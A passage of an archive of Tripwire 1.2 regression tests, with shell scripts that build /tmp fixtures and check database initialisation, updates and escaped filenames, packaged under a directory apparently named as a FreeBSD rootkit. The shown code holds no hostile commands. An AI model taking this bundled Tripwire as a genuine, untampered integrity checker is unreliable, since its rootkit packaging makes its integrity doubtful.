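 * Exits 0 on success, 1 on any open/write/close failure.
 */
int
main(argc, argv)
    int argc;
    char *argv[];
{
    int i;
    int n;
    char *pc;
    int slen;
    int fd;
    char filename[100];

    if (argc == 2) {
        /*
         * Result deliberately ignored; a missing directory shows up as
         * an open() failure below.  The 0777 request, like the 0666
         * below, is still filtered by the caller's umask.
         */
        mkdir(argv[1], 0777);
    }

    for (i = 0; i < (int)(sizeof(pc_strings) / sizeof(pc_strings[0])); i++) {
        pc = pc_strings[i];

        /* bounded format: never write past filename[] */
        n = snprintf(filename, sizeof(filename), "%s/t_file%d", TESTFILEDIR, i);
        if (n < 0 || (size_t)n >= sizeof(filename)) {
            fputs("filename too long!", stderr);
            exit(1);
        }

        /*
         * O_TRUNC: these files are hashed as fixtures, so stale bytes
         * left over from a longer pre-existing file must not survive.
         */
        if ((fd = open(filename, O_CREAT|O_WRONLY|O_TRUNC, 0666)) < 0) {
            perror("open()");
            exit(1);
        }

        /* check for special tests */
        if (strncmp(pc, "@@", 2) == 0) {
            /* fix: this path used to leak the descriptor */
            close(fd);
            continue;
        }

        /* else, it's a literal string */
        slen = strlen(pc);
        if (write(fd, pc, slen) != slen) {
            fputs("incomplete write!", stderr);
            exit(1);
        }

        /* a failed close can mean the data never reached the file */
        if (close(fd) < 0) {
            perror("close()");
            exit(1);
        }
    }
    exit(0);
}
fbsdrootkit-1.2/tripwire-1.2/tests/test.escape.sh100700 764 764 16243 5502473071 17244 0ustar dfdf#!/bin/sh # $Id: test.escape.sh,v 1.2 1993/12/12 01:39:05 genek Exp $ # # Rigorous Tripwire functionality test suite # # Gene Kim # Purdue University # ME=$0 TMPDIR=/tmp/twtest TWCONFIG=$TMPDIR/tw.config TWDB=$TMPDIR/tw.db TRIPWIRE="../src/tripwire -loosedir -c $TWCONFIG -d $TWDB -i all " NEWFILE="$TMPDIR/d1/@@NEWFILE" OLDFILE="$TMPDIR/@@OLDFILE" GROWFILE="$TMPDIR/grow" STATFILE="/tmp/twstat"; SAVETWDB=/tmp/twXXX LOGFILE=/tmp/TWLOG STATUSADD=2 # exit status of Tripwire STATUSDEL=4 STATUSCHA=8 MYRUN=/tmp/twrun.sh MYCHECK=/tmp/twcheck.sh MYCREATE=/tmp/twcreate.sh MYINIT=/tmp/twinit.sh MYCREATETWCONF=/tmp/twctwconf.sh cat << GHK === $ME: DESCRIPTION This is similar to the Tripwire update tests, but escaped filenames are specifically exercised. GHK echo "=== $ME: Setting up auxiliary scripts ===" # build run() cat << 'EOF' > $MYRUN echo running Tripwire echo $* $* laststatus=$?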
echo $laststatus > $STATFILE EOF # build checkstat() cat << 'EOF' > $MYCHECK DESIRED=$1 laststatus=`cat $STATFILE` if [ $laststatus -ne $DESIRED ] then echo "=== $ME: test FAILED! (expecting $DESIRED, got $laststatus) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi EOF #### TMPFILES="@1 @2 @3 @4 @5" TMPDIRS="d1 d2" cat << 'EOF' > $MYCREATE #echo "=== $ME: creating test environment ===" rm -rf $TMPDIR mkdir $TMPDIR for f in $TMPFILES; do touch $TMPDIR/$f done for d in $TMPDIRS; do mkdir $TMPDIR/$d for f in $TMPFILES; do touch $TMPDIR/$d/$f done done touch $OLDFILE touch $GROWFILE EOF cat << 'EOF' > $MYINIT #echo "=== $ME: initializing the database ===" touch $TWCONFIG $TWDB $OLDFILE rm -f databases/* set _ $TRIPWIRE -initialize -q; shift ( . $MYRUN ; ) > $LOGFILE set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB # save a copy cp ./databases/* $SAVETWDB EOF cat << 'EOF' > $MYCREATETWCONF #echo "=== $ME: creating tw.config file ===" cat << GHK > $TWCONFIG # $TMPDIR R $TMPDIR/d1 R $TMPDIR/d2 R $TWCONFIG $TMPDIR/grow L> $TWDB E # GHK EOF # create the tw.config file # initialize the database # test update functionality # case i. updated entry # case ii. updated file # case iii. deleted file # case iv. added file # echo === $ME: BEGIN === echo $TRIPWIRE . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: testing complex UPDATE cases" echo "=== $ME: changed ignore-mask (UPDATE file)" touch $TMPDIR/d1/@1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -update $TMPDIR/d1/@1; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . 
$MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: changed ignore-mask (UPDATE entry)" touch $TMPDIR/d1/@1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -update $TMPDIR/d1; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: testing UPDATED files (6 cases)" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: case 1: update: add new file ===" cp $SAVETWDB ./databases touch $NEWFILE set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $NEWFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 2: update: delete file ===" rm -f $OLDFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $OLDFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . 
$MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d1/@1 CDIR=$TMPDIR/d1 echo "=== $ME: case 3: update: update file ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 4: nonsense case (skipping) ===" echo "=== $ME: case 6: update: delete entry ===" rm -rf $CDIR set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 5: update: add entry ===" mkdir $CDIR touch $CDIR/@1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d2/@1 CDIR=$TMPDIR/d2 echo "=== $ME: case 7: update: update entry ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift . 
$MYCHECK echo "=== $ME: PASS ===" echo echo fbsdrootkit-1.2/tripwire-1.2/tests/test.inter.sh100700 764 764 17473 5532334113 17127 0ustar dfdf#!/bin/sh # $Id: test.inter.sh,v 1.10 1994/02/22 07:46:19 gkim Exp $ # # Rigorous Tripwire functionality test suite # # Gene Kim # Purdue University # ME=$0 TMPDIR=/tmp/twtest TWCONFIG=$TMPDIR/tw.config TWDB=$TMPDIR/tw.db TRIPWIRE="../src/tripwire -loosedir -c $TWCONFIG -d $TWDB -i all " UPDATEFLAG="interactive -interactivetest_yesimsure" NEWFILE="$TMPDIR/d1/@@NEWFILE" OLDFILE="$TMPDIR/@@OLDFILE" GROWFILE="$TMPDIR/grow" STATFILE="/tmp/twstat"; SAVETWDB=/tmp/twXXX LOGFILE=/tmp/TWLOG STATUSADD=2 # exit status of Tripwire STATUSDEL=4 STATUSCHA=8 MYRUN=/tmp/twrun.sh MYCHECK=/tmp/twcheck.sh MYCREATE=/tmp/twcreate.sh MYINIT=/tmp/twinit.sh MYCREATETWCONF=/tmp/twctwconf.sh cat << GHK === $ME: DESCRIPTION This shell script exercises all the interactive update of Tripwire databases. GHK echo "=== $ME: Setting up auxiliary scripts ===" # build run() cat << 'EOF' > $MYRUN #sleep 1 # agh! Bug in SunOS tmpfs!!! echo running Tripwire echo $* $* laststatus=$? echo $laststatus > $STATFILE EOF # build checkstat() cat << 'EOF' > $MYCHECK DESIRED=$1 laststatus=`cat $STATFILE` if [ $laststatus -ne $DESIRED ] then echo "=== $ME: test FAILED! (expecting $DESIRED, got $laststatus) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi EOF #### TMPFILES="f1 f2 f3 f4 f5" TMPDIRS="d1 d2" cat << 'EOF' > $MYCREATE #echo "=== $ME: creating test environment ===" rm -rf $TMPDIR mkdir $TMPDIR for f in $TMPFILES; do touch $TMPDIR/$f done for d in $TMPDIRS; do mkdir $TMPDIR/$d for f in $TMPFILES; do touch $TMPDIR/$d/$f done done touch $OLDFILE touch $GROWFILE EOF cat << 'EOF' > $MYINIT #echo "=== $ME: initializing the database ===" touch $TWCONFIG $TWDB $OLDFILE rm -f databases/* set _ $TRIPWIRE -initialize -q; shift ( . $MYRUN ; ) > $LOGFILE set _ 0; shift . 
$MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB # save a copy cp ./databases/* $SAVETWDB EOF cat << 'EOF' > $MYCREATETWCONF #echo "=== $ME: creating tw.config file ===" cat << GHK > $TWCONFIG # $TMPDIR R $TMPDIR/d1 R $TMPDIR/d2 R $TWCONFIG $TMPDIR/grow L> $TWDB E # GHK EOF # create the tw.config file # initialize the database # test update functionality # case i. updated entry # case ii. updated file # case iii. deleted file # case iv. added file # echo === $ME: BEGIN === echo $TRIPWIRE . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: testing interactive update ===" set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE ; set _ 0; shift; . $MYCHECK touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ $STATUSCHA; shift; . $MYCHECK set _ $TRIPWIRE -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift; . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift; . $MYCHECK echo "=== $ME: testing complex UPDATE cases" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: changed ignore-mask (UPDATE file)" touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG ; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1/f1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1/f1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: changed ignore-mask (UPDATE entry)" touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . 
$MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1/f1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1/f1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: testing UPDATED files (6 cases)" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: case 1: update: add new file ===" cp $SAVETWDB ./databases touch $NEWFILE set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 2: update: delete file ===" rm -f $OLDFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d1/f1 CDIR=$TMPDIR/d1 echo "=== $ME: case 3: update: update file ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . 
$MYCHECK echo "=== $ME: case 4: nonsense case (skipping) ===" echo "=== $ME: case 6: update: delete entry ===" rm -rf $CDIR set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 5: update: add entry ===" mkdir $CDIR set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d2/f1 CDIR=$TMPDIR/d2 echo "=== $ME: case 7: update: update entry ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -$UPDATEFLAG; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE ; set _ 0; shift . $MYCHECK echo "=== $ME: PASS ===" echo echo fbsdrootkit-1.2/tripwire-1.2/tests/test.twpre.sh100700 764 764 2657 5532334114 17126 0ustar dfdf#!/bin/sh ME=$0 TMPINFILE=/tmp/tw1 TMPOUTFILE=/tmp/tw2 TMPOUTCTRL=/tmp/twctrl TMPINC1=/tmp/twinc1 TMPINC2=/tmp/twinc2 cat << EOF === $ME: DESCRIPTION This script excercises the Tripwire preprocessor, testing correctness variable expansion and include files. 
=== $ME: BEGIN === EOF TW="../src/tripwire -E" cat << EOF > $TMPINFILE @@define VN1 @@define VN2 @@define VN3 @@define VN4 @@define VN5 @@define V1 Z+pinugs123 @@define V2 Y+pinugs123 @@define V3 Z+pinugs123 @@define V4 W+pinugs123 @@define V5 V+pinugs123 @@VN1 @@VN2 @@VN3 @@VN4 @@VN5 @@V1 @@V2 @@V3 @@V4 @@V5 @@V1 @@V1 @@V1 @@V1 @@V1 @@V1@@V1@@V1@@V1@@V1 @@V1@@V1@@V1@@V1@@V1@@V1@@V1@@V1@@V1@@V1 @@define X1_1 XX @@{X1_1} X1_1 @@define X 1 @@define XX 2 @@define XXX 3 @@{X}@@{XX}@@{XXX} @@include $TMPINC1 EOF cat << EOF > $TMPOUTCTRL Z+pinugs123 Y+pinugs123 Z+pinugs123 W+pinugs123 V+pinugs123 Z+pinugs123 Z+pinugs123 Z+pinugs123 Z+pinugs123 Z+pinugs123 Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123 Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123Z+pinugs123 XX X1_1 123 xxx xxx xxx xxx EOF cat > $TMPINC1 << EOF @@define F1 xxx @@{F1} @@F1 @@include $TMPINC2 EOF cat > $TMPINC2 << EOF @@{F1} @@F1 EOF $TW -c $TMPINFILE > $TMPOUTFILE diff $TMPOUTFILE $TMPOUTCTRL if [ $? 
-ne 0 ] then echo "=== $ME: FAILED ===" exit 1 else echo "=== $ME: PASS ===" exit 0 fi #rm -f $TMPOUTFILE $TMPINFILE $TMPOUTCTRL fbsdrootkit-1.2/tripwire-1.2/tests/test.update.sh100700 764 764 21126 5532334116 17261 0ustar dfdf#!/bin/sh # $Id: test.update.sh,v 1.6 1994/02/22 07:46:22 gkim Exp $ # # Rigorous Tripwire functionality test suite # # Gene Kim # Purdue University # ME=$0 TMPDIR=/tmp/twtest TWCONFIG=$TMPDIR/tw.config TWDB=$TMPDIR/tw.db TRIPWIRE="../src/tripwire -loosedir -c $TWCONFIG -d $TWDB -i all " NEWFILE="$TMPDIR/d1/@@NEWFILE" OLDFILE="$TMPDIR/@@OLDFILE" GROWFILE="$TMPDIR/grow" STATFILE="/tmp/twstat"; SAVETWDB=/tmp/twXXX LOGFILE=/tmp/TWLOG STATUSADD=2 # exit status of Tripwire STATUSDEL=4 STATUSCHA=8 MYRUN=/tmp/twrun.sh MYCHECK=/tmp/twcheck.sh MYCREATE=/tmp/twcreate.sh MYINIT=/tmp/twinit.sh MYCREATETWCONF=/tmp/twctwconf.sh cat << GHK === $ME: DESCRIPTION This shell script exercises all the Tripwire integrity checking and database update functionalities. GHK echo "=== $ME: Setting up auxiliary scripts ===" # build run() cat << 'EOF' > $MYRUN #sleep 1 # agh! Bug in SunOS tmpfs!!! echo running Tripwire echo $* $* laststatus=$? echo $laststatus > $STATFILE EOF # build checkstat() cat << 'EOF' > $MYCHECK DESIRED=$1 laststatus=`cat $STATFILE` if [ $laststatus -ne $DESIRED ] then echo "=== $ME: test FAILED! (expecting $DESIRED, got $laststatus) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi EOF #### TMPFILES="f1 f2 f3 f4 f5" TMPDIRS="d1 d2" cat << 'EOF' > $MYCREATE #echo "=== $ME: creating test environment ===" rm -rf $TMPDIR mkdir $TMPDIR for f in $TMPFILES; do touch $TMPDIR/$f done for d in $TMPDIRS; do mkdir $TMPDIR/$d for f in $TMPFILES; do touch $TMPDIR/$d/$f done done touch $OLDFILE touch $GROWFILE EOF cat << 'EOF' > $MYINIT #echo "=== $ME: initializing the database ===" touch $TWCONFIG $TWDB $OLDFILE rm -f databases/* set _ $TRIPWIRE -initialize -q; shift ( . $MYRUN ; ) > $LOGFILE set _ 0; shift . 
$MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB # save a copy cp ./databases/* $SAVETWDB EOF cat << 'EOF' > $MYCREATETWCONF #echo "=== $ME: creating tw.config file ===" cat << GHK > $TWCONFIG # $TMPDIR R $TMPDIR/d1 R $TMPDIR/d2 R $TWCONFIG $TMPDIR/grow L> $TWDB E # GHK EOF # create the tw.config file # initialize the database # test update functionality # case i. updated entry # case ii. updated file # case iii. deleted file # case iv. added file # echo === $ME: BEGIN === echo $TRIPWIRE . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: testing GROWING (safe) files ===" cp $TWCONFIG $GROWFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE ; set _ 0; shift; . $MYCHECK touch $OLDFILE . $MYINIT echo "=== $ME: testing GROWING (unsafe) files ===" rm -f $GROWFILE touch $GROWFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK . $MYINIT echo "=== $ME: testing ADDED files ===" touch $NEWFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE ; rm -f $NEWFILE set _ $STATUSADD; shift . $MYCHECK echo "=== $ME: testing DELETED files ===" rm -f $OLDFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE ; set _ $STATUSDEL; shift . $MYCHECK touch $OLDFILE echo "=== $ME: testing CHANGED files ===" set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE ; set _ $STATUSCHA; shift . $MYCHECK echo "=== $ME: testing input schemes ===" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: tw.config from stdin" set _ $TRIPWIRE -q -c - -d $TWDB; shift ( . $MYRUN ; ) > $LOGFILE < $TWCONFIG ; set _ 0; shift . $MYCHECK echo "=== $ME: database from stdin" set _ $TRIPWIRE -q -c $TWCONFIG -d - ; shift ( . $MYRUN ; ) > $LOGFILE < $TWDB ; set _ 0; shift . $MYCHECK echo "=== $ME: testing complex UPDATE cases" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: changed ignore-mask (UPDATE file)" touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . 
$MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -update $TMPDIR/d1/f1; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1/f1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1/f1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: changed ignore-mask (UPDATE entry)" touch $TMPDIR/d1/f1 set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK # change the ignore mask sed "s,$TMPDIR/d1 R,$TMPDIR/d1 L," < $TWCONFIG > /tmp/twx mv /tmp/twx $TWCONFIG set _ $TRIPWIRE -d $TWDB -q -update $TMPDIR/d1; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # check to that ignore-masks are different grep "$TMPDIR/d1/f1" ./databases/* | awk '{ print $3; }' > /tmp/tw1 grep "$TMPDIR/d1/f1" $TWDB | awk '{ print $3; }' > /tmp/tw2 echo "diffing" >> $LOGFILE diff /tmp/tw1 /tmp/tw2 >> $LOGFILE if [ $? -ne 1 ]; then echo "=== $ME: test diff FAILED! (expecting 1, got $?) ===" echo "=== ($LOGFILE contains output from test script and Tripwire) ===" exit 1 fi echo "=== $ME: testing UPDATED files (6 cases)" . $MYCREATE . $MYCREATETWCONF . $MYINIT echo "=== $ME: case 1: update: add new file ===" cp $SAVETWDB ./databases touch $NEWFILE set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $NEWFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . 
$MYCHECK echo "=== $ME: case 2: update: delete file ===" rm -f $OLDFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $OLDFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d1/f1 CDIR=$TMPDIR/d1 echo "=== $ME: case 3: update: update file ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CFILE; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 4: nonsense case (skipping) ===" echo "=== $ME: case 6: update: delete entry ===" rm -rf $CDIR set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSDEL; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK echo "=== $ME: case 5: update: add entry ===" mkdir $CDIR set _ $TRIPWIRE -q ; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSADD; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK # move database rm -f databases/*.old cp databases/tw.db* $TWDB set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . $MYCHECK CFILE=$TMPDIR/d2/f1 CDIR=$TMPDIR/d2 echo "=== $ME: case 7: update: update entry ===" touch $CFILE set _ $TRIPWIRE -q; shift ( . $MYRUN ; ) > $LOGFILE; set _ $STATUSCHA; shift . $MYCHECK set _ $TRIPWIRE -d $TWDB -q -update $CDIR; shift ( . $MYRUN ; ) >> $LOGFILE; set _ 0; shift . 
